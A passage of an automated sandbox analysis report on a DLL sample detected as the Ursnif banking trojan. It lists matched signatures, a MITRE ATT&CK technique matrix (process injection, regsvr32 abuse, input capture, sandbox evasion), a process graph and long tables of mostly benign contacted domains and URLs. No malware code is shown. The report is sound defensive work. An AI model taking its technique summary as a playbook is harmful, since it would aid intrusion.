            Source: Yara matchFile source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6944, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 320211 Sample: 0pz1on1.dll Startdate: 19/11/2020 Architecture: WINDOWS Score: 84 34 Found malware configuration 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected  Ursnif 2->38 40 2 other signatures 2->40 8 loaddll32.exe 1 2->8         started        process3 process4 10 regsvr32.exe 8->10         started        13 cmd.exe 1 8->13         started        signatures5 42 Writes or reads registry keys via WMI 10->42 44 Writes registry values via WMI 10->44 46 Creates a COM Internet Explorer object 10->46 15 iexplore.exe 1 61 13->15         started        process6 process7 17 iexplore.exe 158 15->17         started        20 iexplore.exe 25 15->20         started        22 iexplore.exe 29 15->22         started        dnsIp8 24 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49756, 49757 FASTLYUS United States 17->24 26 outbrain.map.fastly.net 151.101.2.132, 443, 49762, 49763 FASTLYUS United States 17->26 32 9 other IPs or domains 17->32 28 ocsp.sca1b.amazontrust.com 54.230.104.94, 49775, 49776, 80 AMAZON-02US United States 20->28 30 192.168.2.1 unknown unknown 22->30

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            0pz1on1.dll13%VirustotalBrowse
            0pz1on1.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.26f0000.3.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            tls13.taboola.map.fastly.net0%VirustotalBrowse
            ocsp.sca1b.amazontrust.com0%VirustotalBrowse
            outbrain.map.fastly.net0%VirustotalBrowse
            img.img-taboola.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://secure.globalsign.net/cacert/ObjectSign.crt090%Avira URL Cloudsafe
            https://www.remixd.com/privacy_policy.html0%Avira URL Cloudsafe
            https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%Avira URL Cloudsafe
            https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&amp;utm_campaign=infopane-elec0%Avira URL Cloudsafe
            https://bealion.com/politica-de-cookies0%Avira URL Cloudsafe
            https://www.gadsme.com/privacy-policy/0%Avira URL Cloudsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%Avira URL Cloudsafe
            https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-karte0%Avira URL Cloudsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=topnav0%Avira URL Cloudsafe
            https://channelpilot.co.uk/privacy-policy0%Avira URL Cloudsafe
            https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
            https://www.admo.tv/en/privacy-policy0%Avira URL Cloudsafe
            http://www.globalsign.net/repository/00%Avira URL Cloudsafe
            http://www.bullguard.com00%Avira URL Cloudsafe
            https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-live0%Avira URL Cloudsafe
            http://www.globalsign.net/repository090%Avira URL Cloudsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=mestripe0%Avira URL Cloudsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&amp;h=330%Avira URL Cloudsafe
            https://listonic.com/privacy/0%Avira URL Cloudsafe
            https://quantyoo.de/datenschutz0%Avira URL Cloudsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            http://secure.globalsign.net/cacert/PrimObject.crt00%Avira URL Cloudsafe
            https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&amp;h=330%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            23.54.113.52
            truefalse
              high
              tls13.taboola.map.fastly.net
              151.101.1.44
              truefalseunknown
              ocsp.sca1b.amazontrust.com
              54.230.104.94
              truefalseunknown
              hblg.media.net
              23.54.113.52
              truefalse
                high
                lg3.media.net
                23.54.113.52
                truefalse
                  high
                  outbrain.map.fastly.net
                  151.101.2.132
                  truefalseunknown
                  web.vortex.data.msn.com
                  unknown
                  unknownfalse
                    high
                    www.msn.com
                    unknown
                    unknownfalse
                      high
                      srtb.msn.com
                      unknown
                      unknownfalse
                        high
                        img.img-taboola.com
                        unknown
                        unknownfalseunknown
                        zem.outbrainimg.com
                        unknown
                        unknownfalse
                          unknown
                          cvision.media.net
                          unknown
                          unknownfalse
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://secure.globalsign.net/cacert/ObjectSign.crt090pz1on1.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://searchads.msn.net/.cfm?&&kp=1&{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                              high
                              https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                high
                                https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                  high
                                  https://www.remixd.com/privacy_policy.htmliab2Data[1].json.6.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://onedrive.live.com;Fotos85-0f8009-68ddb2ab[1].js.6.drfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mode-ch[1].htm.6.drfalse
                                    high
                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                      high
                                      https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel85-0f8009-68ddb2ab[1].js.6.drfalse
                                        high
                                        http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                          high
                                          https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hplde-ch[1].htm.6.drfalse
                                            high
                                            https://outlook.live.com/mail/deeplink/compose;Kalender85-0f8009-68ddb2ab[1].js.6.drfalse
                                              high
                                              https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                high
                                                https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancomade-ch[1].htm.6.drfalse
                                                  high
                                                  https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                    high
                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn85-0f8009-68ddb2ab[1].js.6.drfalse
                                                      high
                                                      https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionierende-ch[1].htm.6.drfalse
                                                        high
                                                        https://www.msn.com/de-ch/sport/fussball/petkovic-wollen-auch-k%c3%bcnftig-gegen-grosse-mannschaftende-ch[1].htm.6.drfalse
                                                          high
                                                          https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_sitede-ch[1].htm.6.drfalse
                                                            high
                                                            https://www.skype.com/de-ch[1].htm.6.drfalse
                                                              high
                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%auction[1].htm.6.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/arde-ch[1].htm.6.drfalse
                                                                high
                                                                https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                  high
                                                                  https://r1-usc1.zemanta.com/rp/u1gklbadixog/b1_msn/3927532/30291974/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27auction[1].htm.6.drfalse
                                                                    high
                                                                    https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                      high
                                                                      https://www.msn.com/de-ch/?ocid=iehp:{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                        high
                                                                        https://onedrive.live.com/?qt=allmyphotos;Aktuelle85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                          high
                                                                          https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                            high
                                                                            https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                              high
                                                                              https://client-s.gateway.messenger.live.com85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                high
                                                                                https://www.brightcom.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                  high
                                                                                  https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                    high
                                                                                    https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                      high
                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                        high
                                                                                        https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.6.drfalse
                                                                                          high
                                                                                          https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&amp;utm_campaign=infopane-elecde-ch[1].htm.6.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://bealion.com/politica-de-cookiesiab2Data[1].json.6.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                            high
                                                                                            https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-verticals-shoppinghubde-ch[1].htm.6.drfalse
                                                                                              high
                                                                                              https://twitter.com/i/notifications;Ich85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                high
                                                                                                https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.6.drfalse
                                                                                                  high
                                                                                                  https://www.gadsme.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://portal.eu.numbereight.me/policies-license#software-privacy-noticeiab2Data[1].json.6.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                    high
                                                                                                    https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                      high
                                                                                                      https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                        high
                                                                                                        http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                          high
                                                                                                          https://docs.prebid.org/privacy.htmliab2Data[1].json.6.drfalse
                                                                                                            high
                                                                                                            https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-kartede-ch[1].htm.6.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://onedrive.live.com/?qt=mru;OneDrive-App85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                              high
                                                                                                              https://www.skype.com/de85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                high
                                                                                                                https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                                                                                                  high
                                                                                                                  https://www.skype.com/de/download-skype85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                    high
                                                                                                                    https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downliab2Data[1].json.6.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-side-ch[1].htm.6.drfalse
                                                                                                                      high
                                                                                                                      https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                                                                                        high
                                                                                                                        https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=topnavde-ch[1].htm.6.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.hotmail.msn.com/pii/ReadOutlookEmail/85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                          high
                                                                                                                          https://channelpilot.co.uk/privacy-policyiab2Data[1].json.6.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://onedrive.live.com;OneDrive-App85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          low
                                                                                                                          https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                            high
                                                                                                                            https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=185-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                              high
                                                                                                                              https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                                high
                                                                                                                                https://www.admo.tv/en/privacy-policyiab2Data[1].json.6.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://www.globalsign.net/repository/00pz1on1.dllfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPathiab2Data[1].json.6.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.bullguard.com00pz1on1.dllfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&amp;utm_campaign=shop-livede-ch[1].htm.6.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862de-ch[1].htm.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://onedrive.live.com/?qt=mru;Aktuelle85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.globalsign.net/repository090pz1on1.dllfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.msn.com/de-ch/?ocid=iehp{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninitde-ch[1].htm.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.blackfridaydeals.ch/?utm_source=ms&amp;utm_campaign=mestripede-ch[1].htm.6.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&amp;h=33auction[1].htm.6.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://onedrive.live.com/about/en/download/85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://popup.taboola.com/germanauction[1].htm.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://listonic.com/privacy/iab2Data[1].json.6.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://twitter.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://r1-usc1.zemanta.com/rp/u1qgeh572kn4/b1_msn/3788882/29593540/X34ACXVUOVAJKRXBYOQ7L6BY4XY5SP27auction[1].htm.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeisde-ch[1].htm.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://quantyoo.de/datenschutziab2Data[1].json.6.drfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://outlook.live.com/calendar85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-ade-ch[1].htm.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.6.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1de-ch[1].htm.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://secure.globalsign.net/cacert/PrimObject.crt00pz1on1.dllfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://onedrive.live.com/#qt=mru85-0f8009-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&amp;h=33auction[1].htm.6.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown

                                                                                                                                                                              Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              151.101.2.132
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                              54.230.104.94
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              151.101.1.44
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              54113FASTLYUSfalse

                                                                                                                                                                              Private

                                                                                                                                                                              IP
                                                                                                                                                                              192.168.2.1

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                              Analysis ID:320211
                                                                                                                                                                              Start date:19.11.2020
                                                                                                                                                                              Start time:07:07:16
                                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 6m 24s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Sample file name:0pz1on1.dll
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                              Number of analysed new started processes analysed:22
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • HDC enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal84.bank.troj.winDLL@13/132@10/4
                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                              HDC Information:
                                                                                                                                                                              • Successful, ratio: 54.6% (good quality ratio 51.7%)
                                                                                                                                                                              • Quality average: 78.8%
                                                                                                                                                                              • Quality standard deviation: 28.7%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 79%
                                                                                                                                                                              • Number of executed functions: 35
                                                                                                                                                                              • Number of non-executed functions: 37
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Adjust boot time
                                                                                                                                                                              • Enable AMSI
                                                                                                                                                                              • Found application associated with file extension: .dll
                                                                                                                                                                              Warnings:
                                                                                                                                                                              Show All
                                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 168.61.161.212, 104.42.151.234, 104.83.120.32, 204.79.197.203, 204.79.197.200, 13.107.21.200, 23.10.249.32, 23.10.249.18, 65.55.44.109, 52.147.198.201, 23.54.113.52, 104.43.139.144, 51.11.168.160, 152.199.19.161, 20.54.26.129, 8.248.97.254, 8.248.117.254, 8.238.85.254, 8.248.131.254, 8.248.147.254, 52.155.217.156, 51.104.139.180
